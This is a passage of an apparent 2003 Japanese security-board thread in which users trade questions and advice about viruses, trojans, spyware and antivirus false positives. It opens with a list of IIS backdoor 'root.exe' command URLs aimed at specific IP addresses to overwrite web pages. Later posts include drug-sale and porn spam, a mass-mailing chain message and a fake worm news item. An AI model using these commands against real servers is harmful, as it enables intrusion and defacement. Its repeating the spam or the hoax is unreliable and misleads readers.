view-source:http://61.64.194.148/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://203.94.68.166/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://161.77.36.168/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://12.242.174.219/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://194.230.248.106/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://203.162.122.156/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.62.170.128/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://64.146.28.203/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.11.130.97/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp
view-source:http://218.11.130.212/scripts/root.exe?/c+echo+itteyoshi+>+d:\inetpub\wwwroot\iisstart.asp
view-source:http://200.69.228.169/scripts/root.exe?/c+echo+itteyoshi+>+c:\inetpub\wwwroot\iisstart.asp


371 :名無しさん@お腹いっぱい。:03/03/14 00:02
hhp://ime.nu/imu.nu/ime.nu/zone.cside.com/asobi/kiken/a/a2.htm
を踏んだら、ネットワークには繋がるのにどのアドレスを入れても
ページが表示されません泣
ほんとに困ってます。誰かアドバイスお願いします!!

372 :名無しさん@お腹いっぱい。:03/03/14 01:03
>>371
ウイルスチェック

373 :名無しさん@お腹いっぱい。:03/03/14 08:36
>>370
ローカルルール違反。板TOP参照。

374 :何でだろう?:03/03/14 12:43
板違い、または既出済かもしれません。その時は誘導願います。

週末の昼頃になると必ず(3週続けて)メールの「送信」が出来なくなってしまいます。
(エラーメッセージはでません。「送信メッセージ」フォルダにメールが残った状態で正常に終わります。)
ネットワーク上に10台程WinPCがあるのですが、その1台だけがトラブリます。
そして週明けになると何事もなかったように直ります。

多方面から原因を調べているのですが、もしかしたら「トロイ木馬」系かな…と思い質問しに来ました。
こんなウイルスorトロイってありますか?
環境はWin98 OE5 ISDN回線です。

よろしくお願いします。



375 :名無しさん@お腹いっぱい。:03/03/14 12:52
>>374
当然ウィルススキャンした上での質問だろうね。
>ウィルスかどうかはウィルススキャンして判断してください。>>1

376 :何でだろう?:03/03/14 13:03
>>375
もちろんでございます!!
ウイルスバスターです。


377 :名無しさん@お腹いっぱい。:03/03/14 13:10
>>376
なら、残念ながら板違い。もう少し状況を整理して
http://pc2.2ch.net/pcqa/で。

378 :何でだろう?:03/03/14 13:22
>>377
…ということは「ウイルスorトロイ」系ではないということでしょうか?
ありがとうございます。
また、別の面から調べてみます。


379 :名無しさん@お腹いっぱい。:03/03/14 14:35
>週末の昼頃になると必ず(3週続けて)メールの「送信」が出来なくなってしまいます

おーい誰かこんな下らないウィルス作る暇な奴いるか〜?

380 :名無しさん@お腹いっぱい。:03/03/14 15:53
>>379
世の中ヒマなやつもいるもんだ
オレモナー

381 :名無しさん@お腹いっぱい。:03/03/14 16:52
age

382 :sainary:03/03/15 00:42
Backdoor.Dvldr にやられて
ファイル削除したのに正常終了しなくなりました。

どうしたらよいかわかりません。
ご存知の方いらっしゃれば教えてください。

383 :名無しさん@お腹いっぱい。:03/03/15 00:55
この度でろだに感染。
初心者なのでまったくわけがわからず業者に頼んで駆除
してもらいました。
甘えん坊な私は逝って来ます・・・。

384 :名無しさん@お腹いっぱい。:03/03/15 06:47
>>383
自分で下手にいじってパソコンぶっ壊すよりは数倍マシだと思う

385 :名無しさん@お腹いっぱい。:03/03/15 06:52
俺もそう思う。

386 :名無しさん@お腹いっぱい。:03/03/15 06:59
すみません、教えて下さい。
トレンドマイクロのオンラインスキャンを試したところ、TROJ_DELWINDという
ウィルスに感染していると出ました。
しかし上記サイトやマカフィーのウィルス情報には載っていませんでした。
ググるとひとつだけそれらしいリストに「TROJ_DELWIND.A」という名前で
出ているだけです。
もし対処方法をご存知の方がいらっしゃいましたら、教えて頂けませんでしょうか?
環境はXP、2000Proのデュアルブートです。

387 :名無しさん@お腹いっぱい。:03/03/15 08:04
>>386おそらく単なるシステムファイルとかHDD破壊系のトロイ
感染も増殖もしないから該当ファイルを削除
http://www.pestpatrol.com/PestInfo/db/d/delwindows_trojan.asp

>>384ぶっ壊して馬鹿がPC使わなくなる方が平和でいい。

388 :名無しさん@お腹いっぱい。:03/03/15 08:22
>>387
よ、横文字サイト・・・w

了解です。早速やってみます。
ありがとうございました。

389 :名無しさん@お腹いっぱい。:03/03/15 14:18
>>387
あああああぁぁぁああああアア!!!!!

英語じゃねぇかぁぁああああああアアアアアア!!!!!!!!

390 :名無しさん@お腹いっぱい。:03/03/15 16:40
age

391 :あぼーん:あぼーん
あぼーん

392 :名無しさん@お腹いっぱい。:03/03/15 16:46
>>391
ウィルス持って無いから由見かおるの肛門パンティ送っときますた。

393 :名無しさん@お腹いっぱい。:03/03/15 16:59
>この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
>様々なネット上の危険からの防御法や対策を語りあうための板です。
>掲示板の荒らし方や侵入の方法、メールボムの送り方等、
>攻撃方法の質問はご遠慮下さい。
>2ちゃんねるでは荒らし依頼は出来ません。
>また、この板ではアタック依頼は受け付けません。
>攻撃依頼を見かけた方は、放置してください。

394 :名無しさん@お腹いっぱい。:03/03/15 21:34
age

395 :名無しさん@お腹いっぱい。:03/03/16 00:28
昨日・今日と続けざまにKlez.H@mmが送られてくるのですが、
これのメールのFromが全部president*@whitehouse.govなんですよね。
(*部分はそれぞれ違う)
もちろんヘッダの「Received: from」のドメインはwhitehouse.govなんかじゃないわけですが。
Klez.H@mmってこんな偽装するんでしたっけ?

396 :名無しさん@お腹いっぱい。:03/03/16 00:59
>>395
KlezはFromを偽装する。

397 :395:03/03/16 01:07
ありがとうございます。
言葉が足りなくて住みません。

From偽装するのは知ってたんですが、4〜5通着たすべてFromが「president*@whitehouse.gov」なので、あれれ?と思ったのです。
亜種かなぁ?とか・・・。
単なる偶然ですかね。

398 :名無しさん@お腹いっぱい。:03/03/16 04:39
2chでウイルスを貼ってあるリンク対策でいい方法があれば教えて下さい。

399 :名無しさん@お腹いっぱい。:03/03/16 05:00
2chに繋げない

400 :名無しさん@お腹いっぱい。:03/03/16 09:39
http://www2.strangeworld.org/uedakana/sahra6138.jpg
これ踏んでしまったのだけどどうやらウィルスらしく
マイコンピューターにアクセスするたびに例外が発生して再起動くらいます。
オンラインスキャンをやろうとしたところスキャン事態マイコンピューターにアクセスするため
例外が発生してウィルスを削除できません。
どうすればいいのでしょうか?教えて下さい

一応インターネット一時ファイルの削除はしましたがまだ例外が発生します。

401 :名無しさん@お腹いっぱい。:03/03/16 09:56
>>400単なるブラクラなんだけどなぁ・・・
crashmeをウィルス認定なんかしてるのはトレンドマイクロだけだし。
例外云々はWindowsならそのうち起きるもんだし
嘘だと思うならViewsourceで見てみれば?

ってことを何遍言っただろうか。ふぅ

402 :名無しさん@お腹いっぱい。:03/03/16 11:08
怪しいリンクはブラクラチェッカで(略

403 :名無しさん@お腹いっぱい。:03/03/16 16:21
ブラクラチェッカ
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?

なお、ノートンインターネットセキュリティを使っている人は、
cgi.coara.or.jpにリファラを返すよう設定したうえでブラクラチェッカ
を使ってください。
http://service1.symantec.com/SUPPORT/INTER/nisjapanesekb.nsf/jp_docid/20021020160209947

404 :名無しさん@お腹いっぱい。:03/03/16 16:55
パケットの送信が勝手に増えるんです。
ウイルスバスターで検索しても何も出てきません。
これって、なんなんでしょうか?


405 :名無しさん@お腹いっぱい。:03/03/16 17:50
>>404
どこへの送信が増えてるのか分からないので、コメント出来ません。

406 :名無しさん@お腹いっぱい。:03/03/16 17:59
usausako_gin@yahoo.co.jpnoki_i@hotmail.comvi811@hotmail.com

407 :404:03/03/16 19:56
どうやって調べたら良いのでしょうか


408 :名無しさん@お腹いっぱい。:03/03/16 20:41
>>404 windump

409 :名無しさん@お腹いっぱい。:03/03/16 22:41
http://news2.2ch.net/test/read.cgi/newsplus/1047814991/l50

ウイルスについての法案

410 :名無しさん@お腹いっぱい。:03/03/16 22:55
age

411 :名無しさん@お腹いっぱい。:03/03/16 23:37
CodeRed、かなりたくさん来てるね

412 :404:03/03/17 00:00
やってみたけど、なにも起動していない状態で、すごい勢いでスクロールして読み取れない。
読んでもわからないけどね。
どしたらいいですか?

413 :名無しさん@お腹いっぱい。:03/03/17 11:17
age

414 :名無しさん@お腹いっぱい。:03/03/17 12:22
すみません、ノートン先生がいくつかウィルスを検出してくれるのですが、
どう対処したら判らないので…ご存知の方がおられましたら、アドバイスお願いします。

■オブジェクト名 C:\WINNT\Fonts\rundll32.exe
■ウィルス名 Backdoor.Dvldr
■適用した処理 ファイルを修復できません

…フォントフォルダ内なので、検出されたファイルを削除したりすればOKかな?と思ったのですが、
そのファイルが見当たらないので削除できないのです…。

■オブジェクト名 C:\WINNT\Fonts\rundll32.exe
■ウィルス名 Backdoor.Dvldr
■適用した処理 ファイルへのアクセスが拒否されました

…同上。
何度も検出されるので、困っています…

415 :名無しさん@お腹いっぱい。:03/03/17 12:35
>>414
オンラインウイルス辞典くらい使えよ
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.dvldr.html

416 :名無しさん@お腹いっぱい。:03/03/17 12:37
>>415
あれ?
さっき見てみたときは、ウィルスの名前だけしか出なくて、解説等が空っぽだったんですけど…

ともあれありがとうございます。読んでみます。

417 :名無しさん@お腹いっぱい。:03/03/17 12:40
Backdoorキタ─wwヘ√レvvw─(゚∀゚)─wwヘ√レvv─!!!!

418 :名無しさん@お腹いっぱい。:03/03/17 12:44
Backdoorキマシタ─wwヘ√レvvw─(゚∀゚)─wwヘ√レvv─!!!!

おかげさまで解決しました。
本当にありがとうございます。

419 :名無しさん@お腹いっぱい。:03/03/17 13:20
起動するとCドライブ全消去みたいなexeファイルってウイルスバスターとかで対処できますか?
その対処も、exeファイル自体にウイルス検索をかけるのか、exeを実行したあと全体にかけるのか・・・

てかこの場合ウイルスとは言わないんですかね?
あとドライブ上に勝手にフォルダを作ってウイルスを作るような内容のプログラムが入ってるexeファイルの場合は
そのexeファイル自体を検索しても意味無いんですか?

420 :名無しさん@お腹いっぱい。:03/03/17 13:41
>>419
ウィルスではないので、基本的にアンチウィルスソフトでは検知できません。
ただし、ベンダーによっては対応しているものも一部ある。

そういうファイルってMXとかで自分の意思でダウソして実行してるんでしょ。
http://pc.2ch.net/sec/kako/1024/10249/1024943662.html

421 :名無しさん@お腹いっぱい。:03/03/17 14:46
>>419ウィルスじゃなくってトロイ
WinnyやMXのファイル交換ソフトにおいて、それも日本人の間で流行してるから
日本で一般向けにそれなりのシェアを持ってるベンダーでは対応してるが
もっとも自動でファイル削除する方法なんていくらでもあるので
その全てを検出できるかは知らん。

これ以上はダウソ板の親切な人にでも聞いてください。

422 :名無しさん@お腹いっぱい。:03/03/17 21:40
3月5日から解凍ソフトの「LHASA」を奨めるようなウイルスメールが来るようになりました。

ソースを見ると
Received: from mx2.******.or.jp (YahooBB219210076104.bbtec.net [219.210.76.104])
とか(私は屋ふーBBじゃない)

Subject: LHASA

本文は
LHA & Zip extractor "Lhasa" ver0.17
一.はじめに
Lhasa は「らさ」と読んでください。・・・(略)
となっています。

またReturn-Path:が私のメールアドレスになっていてUndelivered Mailが届くようにもなりました。

そのメールは
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
となっているのですが私のアウトルックのバージョンとは違います。

安置ウイルスのメーカーページを見たのですがそのような内容は見当たりませんでした。
ちなみにウイルスは緑のハートのアイコンでした。

423 :名無しさん@お腹いっぱい。:03/03/17 22:25
>>422
アンチウィルスソフトは常駐させてないの?
メール受信時にスキャンすればウィルス名が判明すると思うけど。
>ウィルスかどうかはウィルススキャンして判断してください。

424 :名無しさん@お腹いっぱい。:03/03/18 08:13
age

425 :名無しさん@お腹いっぱい。:03/03/18 09:06
W32.Whiter.Trojanと言うウイルスはウイルスチェックソフトに引っ掛からないらしいんですが
現在の最新版にアップデートした場合でもチェックに引っ掛からないんでしょうか?

426 :名無しさん@お腹いっぱい。:03/03/18 09:37
>>425
検索したか?
http://www.google.com/search?q=%22W32.Whiter.Trojan%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2
少なくともノートンやウィルスバスターでは1年半ぐらい前から対応している。
http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_WHITER.D

427 :名無しさん@お腹いっぱい。:03/03/18 09:44
WinnyやMXに起因する問題は、ダウソ板http://tmp.2ch.net/download/で。
WinnyやMXは自己責任でやってくださいです。

428 :名無しさん@お腹いっぱい。:03/03/18 09:49
>>425
http://pc.2ch.net/test/read.cgi/sec/1043502704/796-803n
>>419-421

429 :名無しさん@お腹いっぱい。:03/03/18 10:40
Macro.srcについて教えてください
ググったけど、ワームだということしか分かりませんでした

430 :名無しさん@お腹いっぱい。:03/03/18 10:59
>>429
こんなにいっぱいHitするのに…
http://www.google.com/search?q=%22Macro.src%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2

具体的に何が知りたいのか書かないと答えもらいにくいよ。

431 :名無しさん@お腹いっぱい。:03/03/18 11:17
>>429
Macro.srcと書いて「まくろえすあーるしー」と読みます。

ノートン先生の誤作動で有名になったやつ
以後、LoveLetter誤作動だけが流行したが

432 :名無しさん@お腹いっぱい。:03/03/18 11:55
プロ(・∀・)プント!!

433 :名無しさん@お腹いっぱい。:03/03/18 14:26
age

434 :名無しさん@お腹いっぱい。:03/03/18 15:34
meを使っています。
最近エラーが頻繁に発生します。
ウィルスに感染しているのかも、と思い
トレンドマイクロのウイルスバスターオンラインスキャンで
チェックしたんですが、チェック中にもエラーがでます。
これは一体何なんでしょう?

435 :名無しさん@お腹いっぱい。:03/03/18 16:15
>>434
マルチポスト
http://pc.2ch.net/test/read.cgi/sec/1047648810/145

436 :名無しさん@お腹いっぱい。:03/03/18 17:26
わかりました
ありがとうございました

437 :名無しさん@お腹いっぱい。:03/03/18 19:12
age

438 :名無しさん@お腹いっぱい。:03/03/18 21:48
いきなり「○○から**.**.**.**(IPアドレス?)にインスタントメッセージがとどきました」
とかいうメッセージがでたんですけどまったく心当たりがありませぬ。
MSNメッセンジャーとか何も導入してないのに・・・
こんな風にしてウイルスがきたりしませんか?

439 :名無しさん@お腹いっぱい。:03/03/18 21:50
age

440 :cheshire-cat ◆PhCATJR.v6 :03/03/18 22:11
>>438
これっすか?
http://pc.2ch.net/test/read.cgi/sec/1035271935/l50

441 :名無しさん@お腹いっぱい。:03/03/18 22:56
Sendmailの脆弱性をついて感染、
他サーバに感染行動起こすウイルスて
いまなんか流行ってたか?


442 :名無しさん@お腹いっぱい。:03/03/19 07:14
http://www.kogalu.com/sou/girls/index2.htm
これ踏んじゃいました。
どうしたらいいの?


443 :名無しさん@お腹いっぱい。:03/03/19 10:37
>>442
この板では鑑定はしません。ラウンジの鑑定スレでどうぞ。
勇気が無くて見られない画像解説スレ part315
http://ex.2ch.net/test/read.cgi/entrance/1047975471/l50

ウィルス感染が気になるならウィルススキャン汁。
ブラクラチェッカも使いましょう。>>402-403

444 :名無しさん@お腹いっぱい。:03/03/19 11:18
Code Redの亜種に見る,マイクロソフトの情報公開への取り組み
「TechNetセキュリティセンター」だけではなく「マイクロソフト セキュリティ」なども要チェック
今週のSecurity Check [Windows編] (第90回,2003年3月19日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030318/1/

445 :名無しさん@お腹いっぱい。:03/03/19 11:48
 1991年にイラク軍がクエートに侵攻した直後、クエートの難民と称する少女が米国下院議会で泣きながら、次のような証言をしました。

 「私はクエートから脱出してきました。クエートではイラク兵が赤ちゃんを保育器から取り出して殺したのを見ました。」

 この様子はアメリカのTVから世界中に発信され、イラク軍は世界中から非難を浴びる事になりました。
しかし、この少女は当時クエートには居らず、実は駐米クエート大使の娘で、この証言はアメリカの大手広告代理店が仕事として請負い、
事前に何回もリハーサルをさせたうえで少女にさせた嘘の証言である事が後に判明しました。

 その後アメリカが参戦しブッシュ元大統領の支持率は90%近くまで上がりました。

446 :名無しさん@お腹いっぱい。:03/03/19 16:33
age

447 :c:03/03/19 16:33
★男はココを見るべし★女と金と???★
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
http://www.pink-angel.jp/betu/linkvp2/linkvp.html

448 :名無しさん@お腹いっぱい。:03/03/19 21:05
age

449 :438:03/03/19 22:15
>>440
ありがとうございます。これっぽいです。
ウイルスじゃないんですね。
ウイルスじゃないのに騒いでしまって申し訳ありませんでした。


450 :名無しさん@お腹いっぱい。:03/03/20 00:55
どちらを買おうか迷っています。
どちらが良いか教えて頂けないでしょうか。
よろしくお願いします。
(OSはWin MEです。)


451 :名無しさん@お腹いっぱい。:03/03/20 00:59
>>450
大丈夫ですか?
最近は医療も進歩してるので早めの治療が効果的ですよ

452 :名無しさん@お腹いっぱい。:03/03/20 01:00
>>450
「うまい棒」と「地獄への片道切符」のどちらかか・・・
難しい質問だな、俺は後者を薦める。

453 :名無しさん@お腹いっぱい。:03/03/20 01:03
>>450
「中○生」か「高○生」のどちらかか・・・
難しい質問だな、俺は後者を薦める。

454 :名無しさん@お腹いっぱい。:03/03/20 01:10
>>450
「ミスリルのこて」と「サイコダガー」のどちらかか・・・
難しい質問だな、俺は後者を薦める。

455 :「メールで戦争反対を訴えよう」:03/03/20 01:37
「メールで戦争反対を訴えよう」

悲しい事に望まれない戦争が始まろうとしている。
そこで私にもできる反戦活動はないかと考え実行することにした。
私一人では意味の無いので多くの人に協力をして欲しい。
内容は以下の通りである。

下記にあるアメリカ合衆国大統領宛に皆で平和への願いのメールをしよう。

アメリカ合衆国大統領
president@whitehouse.gov

<平和への願いに少しでも耳を傾けて貰うために>
 ・何度も何度もメールで訴えよう。
 ・訴えることが重要だ、一言だって構わない。
 ・言語は自分の国の言葉でも構わない。訴えないよりも良いからだ。
 ・文章だけでなくて、画像、音声、映像等を添付するのも良いだろう。

<より多くの人の平和への願いを送るために>
この文を可能な限り広めて欲しい、
多くの言葉に翻訳して、
多くの人々の平和への願いを彼らに直に伝えよう。

<最後に>
多くの人の多くの平和への願いが集まれば大きな力となり
それを無視できないものとなるだろう・・・

世界が早く再び平和な状態に戻る事を祈って
平和が訪れるまで繰り返しメールで平和への願いを送ろうではないか。

456 :名無しさん@お腹いっぱい。:03/03/20 02:57
ここ1週間位、「mIRC」がどうこういう窓が起動時に出ます。
オンラインノートンしたら、3つウィルス発見。
除去したはずなのに、まだ「mIRC」が出ます。
何だろうこれは??

457 :名無しさん@お腹いっぱい。:03/03/20 04:08
OS、ウィルス名くらい書け
つか、除去した”はず”って何よ、やってから調べてないのかい?

458 :名無しさん@お腹いっぱい。:03/03/20 04:24
>>457
おーえすwin2000です。
ウィルスは、、

次のウィルスに感染しています: VBS.LoveLetter.A
次のウィルスに感染しています:IRCTrojan
次のウィルスに感染しています:IRC.Mimic

の3つでした。
感染したファイル3つとも削除したんですが、、「mIRC」がどうこうって出まつ…
(3/12定義ファイルでやったんですが、ダメです。)
さっきウィルス定義アップデートしたんで、再度やってみますが…
「mIRC」って何でしょうか…

459 : :03/03/20 04:27
   ,.´ / Vヽヽ
    ! i iノノリ)) 〉
    i l l.´ヮ`ノリ <先生!こんなのがありました!
    l く/_只ヽ    
  | ̄ ̄ ̄ ̄ ̄|
http://saitama.gasuki.com/aomori/

460 :名無しさん@お腹いっぱい。:03/03/20 06:46
【反米英日】新ワーム"Peace Keeper"【サイバーテロ】
http://pc.2ch.net/test/read.cgi/sec/1017309416/

■新型ワーム「Peace Keeper」にサーバ10万台以上が感染

10万台以上のサーバが、新型ワームに感染していることが判明した。
この新型インターネットワームは、Microsoftのソフトウェアの
セキュリティホールを悪用してサーバーに侵入する。
セキュリティ会社の Security Focus が19日に明らかにした。

このワームは、ブッシュ米大統領がフセイン・イラク大統領に突きつけた最後通告の
期限が切れる19日午後8時(米東部時間)に、米英日のサーバーに向け
「Slammer」の10倍以上にあたる膨大な量のパケットを送信する。
そしてこのトラフィックの増加によって、結果的にシステムをサービス拒否状態に
陥らせてしまう。

ただし、19日の開戦を回避した場合はこのワームは発症しない。(WIRED NEWS)


461 :名無しさん@お腹いっぱい。:03/03/20 07:33
>>460
また騙されたんだね(プ
ってのをすでに取得してたんだが、なんか本当にありそうなので踏んでしまった・・・
サイバーテロねぇ・・・・

462 :名無しさん@お腹いっぱい。:03/03/20 08:44
このスレでネタはやめれage

463 :名無しさん@お腹いっぱい。:03/03/20 10:00
アホの願望は見てて哀れだねえ

464 :名無しさん@お腹いっぱい。:03/03/20 14:51
age

465 :名無しさん@お腹いっぱい。:03/03/20 15:24
Lop.comってスパイウェア知ってますか?
一回削除して、しばらく消えていたんですがこのごろまたでてきました、、、
IEを開く度にAd−awareとSpybot両方使って削除して、開いた時
ヤフーになるように設定してるんだけど電源を切って
またPCを起動してIEを開くたびLopが復活してるんです。。。
削除してもそのときはなくなるんですが、またきどうするたびに出てきます。
どうしたらいいんでしょうか?

466 :名無しさん@お腹いっぱい。:03/03/20 15:51
米英の数百のサイトがクラックされたらしいけどなんか情報ない?

467 :名無しさん@お腹いっぱい。:03/03/20 15:55
>>466
されてない

468 :名無しさん@お腹いっぱい。:03/03/20 16:00
>>467
おまえが知らないだけだ

469 :名無しさん@お腹いっぱい。:03/03/20 16:04
>>466
逆にどこでそれを知ったんだ?

470 :名無しさん@お腹いっぱい。:03/03/20 16:13
>>469
セキュリティホールmemo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/


あと、jaipa(社団法人日本インターネットプロバイダー協会)からのメール

-----------------------------------------------------------
> JAIPA事務局 **です。
> いつもお世話になります。
>
>
> 総務省より、至急の調査依頼がありました。
>
> イラクに対する攻撃が始まった関係からか、未確認ですが、
> 他国で数百あまりのWebサイトが改ざんされたという情報があるようです。
>
> つきましては、
>
> 1.会員の皆様の現時点の状況をお知らせください。
>
> 2.また、今後これに類するような状況が発生した場合には、
>  速やかに当協会(***@******)までご連絡ください。
>
> お忙しいところ恐れ入りますが、よろしくお願いいたします。
>
-----------------------------------------------------------

471 :名無しさん@お腹いっぱい。:03/03/20 17:00
ここはウイルス質問情報スレだから、改ざんは別スレでやってくれ。

472 :名無しさん@お腹いっぱい。:03/03/20 17:09
そういう電波混じりのいい加減な情報はどうでもいい

473 :かおり:03/03/20 18:40
E-Z-LIVEの削除の仕方を教えてください。
本当に困ってます…(涙)
旦那が一人で夫婦共同で使っているPCに取り込んでしまったらしく、本人はもう
反省しているのですが、二人して初心者なもんで削除したくてもできないし…。
PCを再起動したらHPがエロサイトになってしまうし…。初期化するしかないので
しょうか…?
お願いです!!!初期化せずに消せる方法があるのなら教えてください!!!
以前のスレッドで似た内容のものがあったのですが削除方法がわからなかったの
で書き込ませていただきました。


474 :名無しさん@お腹いっぱい。:03/03/20 18:43
>>473
http://pc.2ch.net/test/read.cgi/sec/1048152859/のスレの削除依頼
してから質問しろ。

475 :かおり:03/03/20 18:55
しました…。
って言うか削除依頼できたんでしょうか…。

476 :かおり:03/03/20 19:09
誰か教えてくださぁい

477 :466:03/03/20 19:28
続報だ。スレ立てるか・・・


欧米を中心にサイバーテロの情報 総務省確認急ぐ
http://www.asahi.com/national/update/0320/017.html

478 :名無しさん@お腹いっぱい。:03/03/20 19:57
>>473
質問するときはOS等環境を書かないと誰も答えられない。
http://www.geocities.co.jp/SiliconValley-SanJose/3220/startpage.htm
http://www.i-honky.com/BBS/BBS.asp?db=h04&id=804

479 :名無しさん@お腹いっぱい。:03/03/20 22:54
>>465ですが、誰かお願いします・・・

480 :名無しさん@お腹いっぱい。:03/03/20 23:07
>>479
Spybot等で削除した後、IEの設定を戻す必要がある。

http://pc2.2ch.net/test/read.cgi/pcqa/1047359426/3-を参考にIEを直す。

481 :名無しさん@お腹いっぱい。:03/03/20 23:16
ttp://internet.watch.impress.co.jp/www/article/2003/0320/virus.htm

482 :465:03/03/21 00:51
>>480
ありがとございます!
チェックはずしの方法で解決しました!

483 :名無しさん@お腹いっぱい。:03/03/21 11:57
age

484 :名無しさん@お腹いっぱい。:03/03/21 15:01
ノートンのサイトでウィルスチェックやったら
「VBS.Network.E」 というものが検出されました。
削除は容易なようなので、それほど心配してないのですが
感染元のファイルがこのセキュ板の閲覧画面だったので…
どういう事なんでしょう(汗)
OSはWIN98 この板は3月20日(昨日)に初めて訪れて、
その日に感染したようです
ファイル名は sec[1].htm sec[2].htm です

485 :名無しさん@お腹いっぱい。:03/03/21 15:29
>>484
>>2にもあるけれど、ノートンの誤反応

ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/

486 :484:03/03/21 15:33
>>485
そうだったんですね・・・
ありがとう_(._.)_

487 :v:03/03/21 15:38
★男はココを見るべし★女と金とサンプルムービー★
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
http://www.pink-angel.jp/betu/linkvp2/linkvp.html

488 :名無しさん@お腹いっぱい。:03/03/21 17:23
こんなメールきたよ

yaku@postmark.net

サ イ ケ デ リ ッ ク 天 国 〜 ゆ ら ゆ ら 〜
脳 味 噌 は 多 幸 感 で 満 ち 溢 れ ・・・。

http://yaku3.netfirms.com/
http://my.kid-d.com/yaku0/
http://members.fortunecity.co.uk/smoker/

【密売】【密売】【密売】【密売】【密売】【密売】

合 法 ド ラ ッ グ な ん か 、 も う
た る く て  や っ て ら ん な い で し ょ
http://www.smoker.9cy.com/
http://yaku.ciudad.org/
http://book-i.net/yaku0/

【密売】【密売】【密売】【密売】【密売】【密売】

489 :名無しさん@お腹いっぱい。:03/03/21 17:39
>>488
うちにも来た。Shift-JISで。

490 :名無しさん@お腹いっぱい。:03/03/21 17:44
>>489
買ってみたよ

491 :名無しさん@お腹いっぱい。:03/03/21 17:45
>>490
業者かよ氏ね

492 :名無しさん@お腹いっぱい。:03/03/21 20:47
ウイルスをばら撒いてるのって、
ワクチンソフトの関係者だったりして。

493 :名無しさん@お腹いっぱい。:03/03/21 21:01
基本的なハッキングのしかたを教えてください。


494 :493はここ逝こうね:03/03/21 21:32
http://pc.2ch.net/hack/

495 :名無しさん@お腹いっぱい。:03/03/22 00:37
>>492
散々言われてきていることだが

496 :名無しさん@お腹いっぱい。:03/03/22 15:14
http://pc2.2ch.net/test/read.cgi/win/1048235672/l50
ここから誘導されてきました。
XPsp1を使用し、アップデートは頻繁におこなっています。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELWIN.D
このTROJ DELWIN というウィルスを実行してしまったんですが、
実行後すぐにエラーが出て、その実行ファイルは停止したようです。
Sytemフォルダなどを調べて見ましたが、ファイルは普通に残っているようです。
ということは、XPはこのウィルスを弾いてくれたのでしょうか?
心配で再起動もできません。。

497 :名無しさん@お腹いっぱい。:03/03/22 22:27
おそらくアンチウィルスソフトの誤作動だと思うのですが(そう思いたい)
不思議な現象が起こってて不気味なので教えてください。

ネット接続中、数分〜数時間何もしてない時間があったんです。
すると突然プチンという音と共に、ウィルス検出画面に切り替わり
VHPウィルス(?)が検出されたと出ました。
そのときは再起動して放っておいたのですが(エラーチェックがあった)
また、同じ状況で検出されてしまいました。。
原因のわかる方はいませんか?
ソフトはAntiVir Personal Edition(AVGuard)です。

498 :名無しさん@お腹いっぱい。:03/03/22 22:32
どうやらRedlof.aに感染したようなんですが、どうしたらいいでしょう?

499 :名無しさん@お腹いっぱい。:03/03/22 22:49
書き忘れてました。Windows98です。

500 :名無しさん@お腹いっぱい。:03/03/22 22:59
>>497
マルチすんな

>>498
アンチウィルスソフトが発見したのなら、
そのソフトのサイトで調べたか?

501 :名無しさん@お腹いっぱい。:03/03/23 01:14
http://thko.com/passthrough/index.html?
再起動するとIEが↑にかわります。
このウィルスは何で
どうやって駆除すればいいのですか?


502 :名無しさん@お腹いっぱい。:03/03/23 03:44
>>501はマルチ
放置よろ

503 :名無しさん@お腹いっぱい。:03/03/23 12:02
  _____
   /::::::::::::::::::::::::::\
  /::::::::::::::::::::::::::::::::::::::\
  |:::::::::::::::::|_|_|_|_|
  |;;;;;;;;;;ノ   \,, ,,/ ヽ
  |::( 6  ー─◎─◎ )     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |ノ  (∵∴ ( o o)∴)    / >>501はマルチ
/|   <  ∵   3 ∵>  <
::::::\  ヽ        ノ\   \     放置よろ
:::::::::::::\_____ノ:::::::::::\  \___________


504 :名無しさん@お腹いっぱい。:03/03/23 13:21
_____
   /::::::::::::::::::::::::::\
  /::::::::::::::::::::::::::::::::::::::\
  |:::::::::::::::::|_|_|_|_|
  |;;;;;;;;;;ノ   \,, ,,/ ヽ
  |::( 6  ー─◎─◎ )     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |ノ  (∵∴ ( o o)∴)    / >>ムホッ ムホッ
/|   <  ∵   3 ∵>  <マルチハケーン!放置しる!
::::::\  ヽ        ノ\   \    ヴァカ共には参るゼまったく
:::::::::::::\_____ノ:::::::::::\  \___________


505 :名無しさん@お腹いっぱい。:03/03/23 15:26
age

506 :名無しさん@お腹いっぱい。:03/03/23 22:34
age

507 :名無しさん@お腹いっぱい。:03/03/23 23:21
